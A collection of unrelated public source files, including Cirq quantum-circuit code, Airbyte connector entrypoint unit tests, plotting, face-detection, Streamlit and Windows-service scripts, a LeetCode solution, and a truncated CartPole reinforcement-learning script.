mat[1:, :]\n mat_new[-1, :] = mat[0, :]\n\n return np.count_nonzero(mat_new - np.diag(np.diagonal(mat_new))) == 0\n\n\ndef decompose_incrementer_matrix(target_qubits, ancilla):\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n num_of_qubits = len(target_qubits)\n # assume num_of_qubits>=3\n q = target_qubits[::-1]\n op_list = []\n\n if num_of_qubits > 7:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[q[0], q[1], q[2], q[3], q[4], q[5], q[6]],\n target=q[7], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 6:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4], q[5]],\n target=q[6], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 5:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4]],\n target=q[5],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 4:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3]], target=q[4],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 3:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2]], target=q[3],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.TOFFOLI(q[0], q[1], q[2])))\n\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.CNOT(q[0], q[1])))\n\n op_list.append(cirq.X(q[0]))\n\n return op_list\n\ndef find_neighbor_available_qubit(target_qubits):\n for target_qubit in target_qubits:\n neighbor_qubits = target_qubit.neighbors()\n for neighbor_qubit in neighbor_qubits:\n if neighbor_qubit not in target_qubits:\n return neighbor_qubit\n\n","repo_name":"ziweiqiu/qchack-2021-challenge","sub_path":"solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20187226731","text":"import os\nfrom argparse import Namespace\nfrom copy import deepcopy\nfrom typing import Any, List, Mapping, MutableMapping, Union\nfrom unittest import mock\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nimport requests\nfrom airbyte_cdk import AirbyteEntrypoint\nfrom airbyte_cdk import entrypoint as entrypoint_module\nfrom airbyte_cdk.models import (\n AirbyteCatalog,\n AirbyteConnectionStatus,\n AirbyteControlConnectorConfigMessage,\n AirbyteControlMessage,\n AirbyteMessage,\n AirbyteRecordMessage,\n AirbyteStream,\n ConnectorSpecification,\n OrchestratorType,\n Status,\n SyncMode,\n Type,\n)\nfrom airbyte_cdk.sources import Source\n\n\nclass MockSource(Source):\n def read(self, **kwargs):\n pass\n\n def discover(self, **kwargs):\n pass\n\n def check(self, **kwargs):\n pass\n\n @property\n def message_repository(self):\n pass\n\n\ndef _as_arglist(cmd: str, named_args: Mapping[str, Any]) -> List[str]:\n out = [cmd]\n for k, v in named_args.items():\n out.append(f\"--{k}\")\n if v:\n out.append(v)\n return out\n\n\n@pytest.fixture\ndef spec_mock(mocker):\n expected = ConnectorSpecification(connectionSpecification={})\n mock = MagicMock(return_value=expected)\n mocker.patch.object(MockSource, \"spec\", mock)\n return mock\n\n\nMESSAGE_FROM_REPOSITORY = AirbyteMessage(\n type=Type.CONTROL,\n control=AirbyteControlMessage(\n type=OrchestratorType.CONNECTOR_CONFIG,\n emitted_at=10,\n connectorConfig=AirbyteControlConnectorConfigMessage(config={\"any config\": \"a config value\"}),\n ),\n)\n\n\n@pytest.fixture\ndef entrypoint(mocker) -> AirbyteEntrypoint:\n message_repository = MagicMock()\n message_repository.consume_queue.side_effect = [[message for message in [MESSAGE_FROM_REPOSITORY]], []]\n mocker.patch.object(MockSource, \"message_repository\", new_callable=mocker.PropertyMock, return_value=message_repository)\n return AirbyteEntrypoint(MockSource())\n\n\ndef test_airbyte_entrypoint_init(mocker):\n mocker.patch.object(entrypoint_module, \"init_uncaught_exception_handler\")\n AirbyteEntrypoint(MockSource())\n entrypoint_module.init_uncaught_exception_handler.assert_called_once_with(entrypoint_module.logger)\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\", \"expected_args\"],\n [\n (\"spec\", {\"debug\": \"\"}, {\"command\": \"spec\", \"debug\": True}),\n (\"check\", {\"config\": \"config_path\"}, {\"command\": \"check\", \"config\": \"config_path\", \"debug\": False}),\n (\"discover\", {\"config\": \"config_path\", \"debug\": \"\"}, {\"command\": \"discover\", \"config\": \"config_path\", \"debug\": True}),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\", \"debug\": False},\n ),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": \"\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": True},\n ),\n ],\n)\ndef test_parse_valid_args(cmd: str, args: Mapping[str, Any], expected_args, entrypoint: AirbyteEntrypoint):\n arglist = _as_arglist(cmd, args)\n parsed_args = entrypoint.parse_args(arglist)\n assert vars(parsed_args) == expected_args\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\"],\n [\n (\"check\", {\"config\": \"config_path\"}),\n (\"discover\", {\"config\": \"config_path\"}),\n (\"read\", {\"config\": \"config_path\", \"catalog\": \"catalog_path\"}),\n ],\n)\ndef test_parse_missing_required_args(cmd: str, args: MutableMapping[str, Any], entrypoint: AirbyteEntrypoint):\n required_args = {\"check\": [\"config\"], \"discover\": [\"config\"], \"read\": [\"config\", \"catalog\"]}\n for required_arg in required_args[cmd]:\n argcopy = deepcopy(args)\n del argcopy[required_arg]\n with pytest.raises(BaseException):\n entrypoint.parse_args(_as_arglist(cmd, argcopy))\n\n\ndef _wrap_message(submessage: Union[AirbyteConnectionStatus, ConnectorSpecification, AirbyteRecordMessage, AirbyteCatalog]) -> str:\n if isinstance(submessage, AirbyteConnectionStatus):\n message = AirbyteMessage(type=Type.CONNECTION_STATUS, connectionStatus=submessage)\n elif isinstance(submessage, ConnectorSpecification):\n message = AirbyteMessage(type=Type.SPEC, spec=submessage)\n elif isinstance(submessage, AirbyteCatalog):\n message = AirbyteMessage(type=Type.CATALOG, catalog=submessage)\n elif isinstance(submessage, AirbyteRecordMessage):\n message = AirbyteMessage(type=Type.RECORD, record=submessage)\n else:\n raise Exception(f\"Unknown message type: {submessage}\")\n\n return message.json(exclude_unset=True)\n\n\ndef test_run_spec(entrypoint: AirbyteEntrypoint, mocker):\n parsed_args = Namespace(command=\"spec\")\n expected = ConnectorSpecification(connectionSpecification={\"hi\": \"hi\"})\n mocker.patch.object(MockSource, \"spec\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n\n\n@pytest.fixture\ndef config_mock(mocker, request):\n config = request.param if hasattr(request, \"param\") else {\"username\": \"fake\"}\n mocker.patch.object(MockSource, \"read_config\", return_value=config)\n mocker.patch.object(MockSource, \"configure\", return_value=config)\n return config\n\n\n@pytest.mark.parametrize(\n \"config_mock, schema, config_valid\",\n [\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}}, \"additionalProperties\": False}, False),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\"}}}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\", \"airbyte_secret\": True}}}, True),\n (\n {\"username\": \"fake\", \"_limit\": 22},\n {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False},\n True,\n ),\n ],\n indirect=[\"config_mock\"],\n)\ndef test_config_validate(entrypoint: AirbyteEntrypoint, mocker, config_mock, schema, config_valid):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n mocker.patch.object(MockSource, \"spec\", return_value=ConnectorSpecification(connectionSpecification=schema))\n\n messages = list(entrypoint.run(parsed_args))\n if config_valid:\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n else:\n assert len(messages) == 2\n assert messages[0] == MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)\n connection_status_message = AirbyteMessage.parse_raw(messages[1])\n assert connection_status_message.type == Type.CONNECTION_STATUS\n assert connection_status_message.connectionStatus.status == Status.FAILED\n assert connection_status_message.connectionStatus.message.startswith(\"Config validation error:\")\n\n\ndef test_run_check(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n assert spec_mock.called\n\n\ndef test_run_check_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n mocker.patch.object(MockSource, \"check\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_discover(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n expected = AirbyteCatalog(streams=[AirbyteStream(name=\"stream\", json_schema={\"k\": \"v\"}, supported_sync_modes=[SyncMode.full_refresh])])\n mocker.patch.object(MockSource, \"discover\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n assert spec_mock.called\n\n\ndef test_run_discover_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n mocker.patch.object(MockSource, \"discover\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_read(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n expected = AirbyteRecordMessage(stream=\"stream\", data={\"data\": \"stuff\"}, emitted_at=1)\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", return_value=[AirbyteMessage(record=expected, type=Type.RECORD)])\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [_wrap_message(expected), MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n assert spec_mock.called\n\n\ndef test_run_read_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_invalid_command(entrypoint: AirbyteEntrypoint, config_mock):\n with pytest.raises(Exception):\n list(entrypoint.run(Namespace(command=\"invalid\", config=\"conf\")))\n\n\n@pytest.mark.parametrize(\n \"deployment_mode, url, expected_error\",\n [\n pytest.param(\"CLOUD\", \"https://airbyte.com\", None, id=\"test_cloud_public_endpoint_is_successful\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30\", ValueError, id=\"test_cloud_private_ip_address_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://localhost:8080/api/v1/cast\", ValueError, id=\"test_cloud_private_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"http://past.lives.net/api/v1/inyun\", ValueError, id=\"test_cloud_unsecured_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://not:very/cash:443.money\", ValueError, id=\"test_cloud_invalid_url_format\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30 \", ValueError, id=\"test_cloud_incorrect_ip_format_is_rejected\"),\n pytest.param(\"cloud\", \"https://192.168.27.30\", ValueError, id=\"test_case_insensitive_cloud_environment_variable\"),\n pytest.param(\"OSS\", \"https://airbyte.com\", None, id=\"test_oss_public_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://192.168.27.30\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://localhost:8080/api/v1/cast\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"http://past.lives.net/api/v1/inyun\", None, id=\"test_oss_unsecured_endpoint_is_successful\"),\n ],\n)\n@patch.object(requests.Session, \"send\", lambda self, request, **kwargs: requests.Response())\ndef test_filter_internal_requests(deployment_mode, url, expected_error):\n with mock.patch.dict(os.environ, {\"DEPLOYMENT_MODE\": deployment_mode}, clear=False):\n AirbyteEntrypoint(source=MockSource())\n\n session = requests.Session()\n\n prepared_request = requests.PreparedRequest()\n prepared_request.method = \"GET\"\n prepared_request.headers = {\"header\": \"value\"}\n prepared_request.url = url\n\n if expected_error:\n with pytest.raises(expected_error):\n session.send(request=prepared_request)\n else:\n actual_response = session.send(request=prepared_request)\n assert isinstance(actual_response, requests.Response)\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-cdk/python/unit_tests/test_entrypoint.py","file_name":"test_entrypoint.py","file_ext":"py","file_size_in_byte":12872,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"30731504869","text":"\"\"\"\nThis is the source file for the example spectrum. It has the dependencies of\nusing LaTeX with matplotlib. (See https://matplotlib.org/users/usetex.html) If\na LaTeX independent version is desired, simply comment out the line\nplt.rc('text', usetex=True)\n\"\"\"\n\nimport os\nimport re\n\nimport matplotlib.pyplot as plt\n\nimport lrspectrum\n\n\n# Get multiple logfiles\nlglst = []\nfor fil in os.listdir('.'):\n rexp = re.compile('example_\\d.log')\n if rexp.match(fil) is not None:\n lglst.append(fil)\n\nlr = lrspectrum.LRSpectrum(lglst)\nlr.gen_spect(broad=1.0, wlim=(1530, 1570), res=200)\n\n# Plotting options\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nplt.rc('xtick', top=True, direction='in')\nplt.rc('xtick.major', size=4.5, pad=7)\nplt.rc('xtick.minor', visible=True)\nplt.rc('ytick', right=True, direction='in')\nplt.rc('ytick.major', size=4.5)\nplt.rc('ytick.minor', visible=True)\n\nf, ax = plt.subplots(figsize=(4.25, 3.25))\nlr.plot(ax=ax, xlim=(1555, 1575), xshift=23, ylabel='Intensity (Arb.)',\n xlabel='Energy (eV)', yscale=1000, sticks=False, ylim=(0, 3), ls='-',\n c='k', lw=1.5)\n# Doing labels outside for fontsize\nax.set_xlabel('Energy (eV)', fontsize=14)\nax.set_ylabel('Intensity (Arb.)', fontsize=14)\n'''\nax.set_xticklabels(['1555', '', '1556', '', '1557', '', '1558', '', '1559', '',\n '1560', '', '1561', '', '1562', '', '1563', '', '1564', '',\n '1565', '', '1566', '', '1567', '', '1568', '', '1569', '',\n '1570']\n ) \n'''\nax.set_xticklabels([str(i) for i in range(1555, 1571)])\nax.set_title('Calculated Aluminum K-Edge', fontsize=16, fontweight='bold')\nplt.tight_layout()\nplt.savefig('aluminumKedge.png', dpi=500)\nplt.show()\n","repo_name":"awild82/lrspectrum","sub_path":"doc/media/example_graph.py","file_name":"example_graph.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"18037319669","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.image import Image\nfrom kivy.uix.widget import Widget\nfrom kivy.config import Config \nfrom socket import *\nfrom kivy.graphics import Rectangle\n\nf1,f2,f3 = False, False, False\n\nclass testWidget(Widget):\n\tdef on_touch_down(self,touch):\n\t\tglobal f1,f2,f3\n\t\tif 'markerid' in touch.profile:\n\t\t\tif touch.fid==2:\n\t\t\t\tf1=True\n\t\t\t\tprint(\"yes1\")\n\t\t\t\t\n\t\t\tif touch.fid==4:\n\t\t\t\tf2=True\n\t\t\t\tprint(\"yes2\")\n\t\t\t\t\n\t\t\tif f1 and f2:\n\t\t\t\twith self.canvas.before:\n\t\t\t\t\tRectangle(source=\"Map2.jpg\",pos=self.pos,size=self.size)\nclass Shortest_pathApp(App):\n\tdef build(self):\n\t\tConfig.set('input','fid1','tuio,0.0.0.0:3333')\n\t\treturn testWidget()\n\n\t\nif __name__ == '__main__':\n\tShortest_pathApp().run()\n","repo_name":"aliasgar521/KivyProject","sub_path":"Shortest path/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"897632162","text":"import cv2, os\n\ncascPath = r\"C:\\Users\\Administrator\\Desktop\\FaceDetection\\haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\nlive = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = live.read()\n\n # Converting frame to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # using haarcascade\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(1,1),\n flags = cv2.CASCADE_SCALE_IMAGE)\n\n os.system(\"cls\")\n print(\"Detected {0} faces!\".format(len(faces)))\n\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Faces Detected\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the capture\nlive.release()\ncv2.destroyAllWindows()","repo_name":"karan10072002/face_detection","sub_path":"face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44052922959","text":"__author__ = 'mirko'\n\nfrom sklearn.externals import joblib\nfrom Tweet import make_tweet\nimport os.path\nimport pymysql\nimport config as cfg\n\nclass Database_manager(object):\n\n db=None\n cur=None\n\n def __init__(self):\n\n self.db = pymysql.connect(host=cfg.mysql['host'],\n user=cfg.mysql['user'],\n passwd=cfg.mysql['passwd'],\n db=cfg.mysql['db'],\n charset='utf8')\n self.cur = self.db.cursor()\n self.cur.execute('SET NAMES utf8mb4')\n self.cur.execute(\"SET CHARACTER SET utf8mb4\")\n self.cur.execute(\"SET character_set_connection=utf8mb4\")\n self.db.commit()\n\n def return_test(self):\n\n\n if os.path.isfile('test.pkl') :\n tweets= joblib.load('test.pkl')\n return tweets\n\n\n tweets=[]\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `test \")\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'test.pkl')\n\n return tweets\n\n\n\n def return_training(self, language=None):\n\n if language==\"ca\" or language==\"es\":\n filter=\" where language='\"+language+\"'\"\n else:\n filter=\"\"\n\n\n if os.path.isfile('training'+filter+'.pkl') :\n tweets= joblib.load('training'+filter+'.pkl')\n return tweets\n\n\n tweets=[]\n\n\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `training` \"+filter)\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'training'+filter+'.pkl')\n\n return tweets\n\n\n\n\n\ndef make_database_manager():\n database_manager = Database_manager()\n\n return database_manager\n\n\nif __name__ == '__main__':\n database_manager = Database_manager()\n tweets=database_manager.return_training()\n\n","repo_name":"mirkolai/iTACOS-at-IberEval2017","sub_path":"Database_manager.py","file_name":"Database_manager.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35706654490","text":"#import libraries\nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport streamlit as st\nimport numpy as np\nimport matplotlib\n#matplotlib.use('Agg')\nimport seaborn as sns \n#Remove Warnings\nst.balloons()\nst.set_option('deprecation.showPyplotGlobalUse', False)\nst.title(\"District_Level_School_Dataset\")\n\n#import dataset\ndf = pd.read_csv('DistrictLevelData_V3.csv')\n\n#First thirty rows\nattendance = df.head(30)\n#Display the table\nst.table(attendance)\nst.header(\"Visualisation Using Seaborn\")\n#bar plot\nst.subheader(\"Bar Plot\")\nattendance.plot(kind='bar')\nst.pyplot()\n#pairplot\nst.subheader(\"Pairplot\")\nsns.pairplot(attendance,)\nst.pyplot()\n#Displot\nst.subheader(\"Displot\")\nsns.displot(attendance['CovidTotalStateCases'])\nst.pyplot()\n#joinplot\nst.subheader(\"JointPlot\")\nsns.jointplot(x='Mem',y='AttendancePercent',data=attendance,kind='hex',color=\"#4CB391\")\nst.pyplot()\n\n#Correation\nst.subheader(\"Heatmap\")\nsns.heatmap(attendance.corr(),cmap='coolwarm',annot=True)\nst.pyplot()\n#Replot\nst.subheader(\"RelPlot\")\nsns.relplot(x='CovidTotalStateCases',y='CovidTotalCountyCases',hue='Weekday', data=attendance)\nst.pyplot()\n\n ","repo_name":"sangeethar25/geeth_assignment","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4957267266","text":"# print square roots in Python language. R. Brown, 9/2010 \n\nfrom math import sqrt\n\n\ndef factorial(x):\n\tresult=1\n\ti=1\n\twhile (i>=1 and i<(n+1)):\n\t\tresult=result*i\n\t\ti=i+1\n\n\treturn result\n\nprint(\"n\\tn!\\n----------------\")\nn=0\nwhile (n<6):\n print(n,\"\\t\",factorial(n))\n n=n+1","repo_name":"kalapathar/hardware_design","sub_path":"hw7/facts.py","file_name":"facts.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26902080174","text":"import os\nimport subprocess\nimport copy \nimport socket\nimport win32serviceutil\n\nimport servicemanager\nimport win32event\nimport win32service\nimport sys\nfrom winreg import *\nimport winreg\n\nfrom loggers import logger\n\n# get path from registry stored for the application by the installer\n\nWORKING_DIR = os.path.abspath(__file__)\nlogger.info(WORKING_DIR) \n\n\nENVIRONMENT = copy.deepcopy(os.environ)\n\n\nclass SalesOrderBookService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"SalesOrderBookService\"\n _svc_display_name_ = \"SALES_ORDER_BOOK_SERVICE\"\n _svc_description_ = \"Pushes sales order book changes every hour\"\n\n\n @classmethod\n def parse_command_line(cls):\n win32serviceutil.HandleCommandLine(cls)\n\n def __init__(self, *args):\n super().__init__(*args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n\n def SvcStop(self):\n self.stop()\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n \n def SvcDoRun(self):\n self.start()\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_, ''))\n self.main()\n\n def start(self):\n logger.info(\"starting service\")\n\n def stop(self):\n logger.info(\"stopping service\")\n\n\n def main(self):\n logger.info(\"running service\")\n subprocess.Popen(['python', 'main.py'], env=ENVIRONMENT)\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(SalesOrderBookService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n win32serviceutil.HandleCommandLine(SalesOrderBookService)","repo_name":"nakamura9/sync_service","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38427395931","text":"\"\"\"\n城市用一个 双向连通 图表示,图中有 n 个节点,从 1 到 n 编号(包含 1 和 n)。图中的边用一个二维整数数组 edges 表示,其中每个 edges[i] = [ui, vi] 表示一条节点 ui 和节点 vi 之间的双向连通边。每组节点对由 最多一条 边连通,顶点不存在连接到自身的边。穿过任意一条边的时间是 time 分钟。\n\n每个节点都有一个交通信号灯,每 change 分钟改变一次,从绿色变成红色,再由红色变成绿色,循环往复。所有信号灯都 同时 改变。你可以在 任何时候 进入某个节点,但是 只能 在节点 信号灯是绿色时 才能离开。如果信号灯是  绿色 ,你 不能 在节点等待,必须离开。\n\n第二小的值 是 严格大于 最小值的所有值中最小的值。\n 例如,[2, 3, 4] 中第二小的值是 3 ,而 [2, 2, 4] 中第二小的值是 4 。\n\n给你 n、edges、time 和 change ,返回从节点 1 到节点 n 需要的 第二短时间 。\n\n注意:\n 你可以 任意次 穿过任意顶点,包括 1 和 n 。\n 你可以假设在 启程时 ,所有信号灯刚刚变成 绿色 。\n\n示例 1:\n 输入:n = 5, edges = [[1,2],[1,3],[1,4],[3,4],[4,5]], time = 3, change = 5\n 输出:13\n 解释:\n 上面的左图展现了给出的城市交通图。\n 右图中的蓝色路径是最短时间路径。\n 花费的时间是:\n - 从节点 1 开始,总花费时间=0\n - 1 -> 4:3 分钟,总花费时间=3\n - 4 -> 5:3 分钟,总花费时间=6\n 因此需要的最小时间是 6 分钟。\n\n 右图中的红色路径是第二短时间路径。\n - 从节点 1 开始,总花费时间=0\n - 1 -> 3:3 分钟,总花费时间=3\n - 3 -> 4:3 分钟,总花费时间=6\n - 在节点 4 等待 4 分钟,总花费时间=10\n - 4 -> 5:3 分钟,总花费时间=13\n 因此第二短时间是 13 分钟。 \n\n示例 2:\n 输入:n = 2, edges = [[1,2]], time = 3, change = 2\n 输出:11\n 解释:\n 最短时间路径是 1 -> 2 ,总花费时间 = 3 分钟\n 最短时间路径是 1 -> 2 -> 1 -> 2 ,总花费时间 = 11 分钟\n\n提示:\n 2 <= n <= 10^4\n n - 1 <= edges.length <= min(2 * 10^4, n * (n - 1) / 2)\n edges[i].length == 2\n 1 <= ui, vi <= n\n ui != vi\n 不含重复边\n 每个节点都可以从其他节点直接或者间接到达\n 1 <= time, change <= 10^3\n\n\"\"\"\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def secondMinimum(self, n: int, edges: List[List[int]], time: int, change: int) -> int:\n graph = [[] for _ in range(n + 1)]\n for e in edges:\n x, y = e[0], e[1]\n graph[x].append(y)\n graph[y].append(x)\n\n # dist[i][0] 表示从 1 到 i 的最短路长度,dist[i][1] 表示从 1 到 i 的严格次短路长度\n dist = [[float('inf')] * 2 for _ in range(n + 1)]\n dist[1][0] = 0\n q = deque([(1, 0)])\n while dist[n][1] == float('inf'):\n p = q.popleft()\n for y in graph[p[0]]:\n d = p[1] + 1\n if d < dist[y][0]:\n dist[y][0] = d\n q.append((y, d))\n elif dist[y][0] < d < dist[y][1]:\n dist[y][1] = d\n q.append((y, d))\n\n ans = 0\n for _ in range(dist[n][1]):\n if ans % (change * 2) >= change:\n ans += change * 2 - ans % (change * 2)\n ans += time\n return ans\n\nif __name__ == \"__main__\":\n n = 5\n edges = [[1,2],[1,3],[1,4],[3,4],[4,5]]\n time = 3\n change = 5\n sol = Solution()\n result = sol.secondMinimum(n, edges, time, change)\n print(result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/3_hard/2045_到达目的地的第二短时间.py","file_name":"2045_到达目的地的第二短时间.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74113258980","text":"#!/usr/bin/env python3\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import *\nimport sys\n\nenv = gym.make('CartPole-v0')\n\nRNG_SEED = 1\ntf.set_random_seed(RNG_SEED)\nenv.seed(RNG_SEED)\n\nalpha = 0.0001\ngamma = 0.99\n\nw_init = xavier_initializer(uniform=False)\nb_init = tf.constant_initializer(0.1)\n\ntry:\n output_units = env.action_space.shape[0]\nexcept AttributeError:\n 